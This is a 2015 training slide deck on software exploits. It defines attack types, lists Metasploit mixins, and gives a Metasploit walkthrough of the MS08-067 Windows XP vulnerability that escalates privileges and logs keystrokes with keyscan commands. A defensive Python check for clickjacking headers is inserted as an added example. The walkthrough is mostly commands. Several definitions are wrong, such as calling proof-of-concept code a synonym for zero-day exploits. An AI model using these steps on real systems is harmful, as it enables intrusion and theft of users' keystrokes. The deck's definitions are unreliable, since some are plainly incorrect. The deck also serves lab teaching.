Introduction of exploit on Windows XP & trick
Post on 09-Jun-2015
Latest Technologies (Exploit Tricks)
Uploaded by Indu Rajawat & Megha Kahndelwal latest.com.co (Imperial Soft Tech)
CONTENTS
1.Introduction
2.Types
3.Exploit Design Goals
4.Exploit Mixins
5.MS08_067_netapi Vulnerability (an example of exploit mixins)
INTRODUCTION
An exploit is a piece of software or chunk of data that takes advantage of a vulnerability or bug in order to cause unintended or unanticipated behavior to occur on a computer.
TYPES
1.XSS (Cross-site scripting)
2.SQL injection
3.Clickjacking
4.DDoS attack
5.PoC attack (Proof of concept)
6.Spoofing
XSS
Cross-site scripting is a security loophole on a website that is hard to detect and stop, making the site vulnerable to attacks from malicious hackers.
SQL injection
SQL injection involves entering SQL code into web forms, e.g. login fields, or into the browser address field, to access and manipulate the database behind the site, system or application.
Clickjacking
Clickjacking attacks a fundamental design of HTML itself. It's pulled off by hiding the target URL within a specially designed iframe that's concealed by a decoy page that contains submission buttons.
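A defender's check for the framing behaviour described above, as an added example that is not part of the original slides: it classifies a response's anti-framing headers, `X-Frame-Options` and the CSP `frame-ancestors` directive, which are the standard server-side controls against clickjacking. The function names, the header sets and the `partner.example` origin are constructed for illustration.

```python
# Added example: classify a response's anti-framing (clickjacking) headers.
RANK = {"unprotected": 0, "allowlist": 1, "same-origin": 2, "blocked": 3}

def classify_frame_ancestors(sources):
    """Map a CSP frame-ancestors source list to a verdict."""
    sources = [s.lower() for s in sources]
    if not sources or sources == ["'none'"]:
        return "blocked"        # an empty list behaves like 'none'
    if any(s in ("*", "http:", "https:") for s in sources):
        return "unprotected"    # effectively any site may frame the page
    if sources == ["'self'"]:
        return "same-origin"
    return "allowlist"          # only the named origins may frame it

def framing_verdict(headers):
    """headers: list of (name, value) pairs, so repeated headers survive."""
    csp, xfo = [], set()
    for name, value in headers:
        name = name.lower()
        if name == "content-security-policy":  # Report-Only never enforces
            for policy in value.split(","):
                for directive in policy.split(";"):
                    parts = directive.split()
                    if parts and parts[0].lower() == "frame-ancestors":
                        csp.append(classify_frame_ancestors(parts[1:]))
                        break   # later duplicates in one policy are ignored
        elif name == "x-frame-options":
            xfo.update(v.strip().upper() for v in value.split(","))
    if csp:
        # frame-ancestors makes browsers ignore X-Frame-Options; every policy
        # must pass, so the strictest one decides.
        return max(csp, key=RANK.get)
    if xfo == {"DENY"}:
        return "blocked"
    if xfo == {"SAMEORIGIN"}:
        return "same-origin"
    # No header, obsolete ALLOW-FROM, mixed or unknown values: flag for review.
    return "unprotected"

SAMPLES = {  # constructed header sets, not captured traffic
    "legacy only": [("X-Frame-Options", "SAMEORIGIN")],
    "obsolete": [("X-Frame-Options", "ALLOW-FROM https://partner.example")],
    "csp wins": [("X-Frame-Options", "DENY"),
                 ("Content-Security-Policy", "frame-ancestors *")],
}

if __name__ == "__main__":
    for label, hdrs in SAMPLES.items():
        print(f"{label}: {framing_verdict(hdrs)}")
```

The "csp wins" sample shows a common misconfiguration: a permissive `frame-ancestors` cancels an otherwise strict `X-Frame-Options: DENY`.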
DDoS attack
A denial of service attack (DoS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it. This is not actually hacking a website, but it is used to take down a website.
If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack. This is one of the most used methods for website hacking.
PoC attack
In computer security the term proof of concept (proof of concept code or PoC) is often used as a synonym for a zero-day exploit which, mainly for its early creation, does not take full advantage over some vulnerability.
Spoofing
A spoofing attack is a situation in which one person or program successfully masquerades as another by falsifying data and thereby gaining an illegitimate advantage.
Design Goals
1.Design goals should be minimalist.
2.Proof of concepts should be written as Auxiliary DoS modules, not as exploits.
3.The final exploit reliability must be high.
4.Target lists should be inclusive.
5.Exploits should be readable as well.
Exploit Mixins
1.Exploit::Remote::Tcp
2.Exploit::Remote::DCERPC
3.Exploit::Remote::SMB
4.Exploit::Remote::BruteTargets
MS08_067_netapi Vulnerability
This is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system remotely. On Microsoft Windows 2000-based, Windows XP-based, and Windows Server 2003-based systems, an attacker could exploit this vulnerability over RPC without authentication and could run arbitrary code.
Steps:
1). msfconsole
2). search exploits
3). use exploits/windows/smb/ms08_067_netapi
4). show options
5). set lhost
6). set rhost
7). exploit
8). now go to Windows XP, open a command window and type netstat -ms
Command prompt
Steps
9). ps
10). migrate (PID)
11). screenshot
12). shell
13). cd documents & settings
14). cd admin
15). cd desktop
16). md folder
17). exit
Screen-shot
New folder
Steps
18). help
19). getsystem
20). keyscan_start
21). now go to Windows XP, open Notepad and write something
22). keyscan_dump
23). keyscan_stop
Thank you
Contact Us on softtechimperial@gmail.com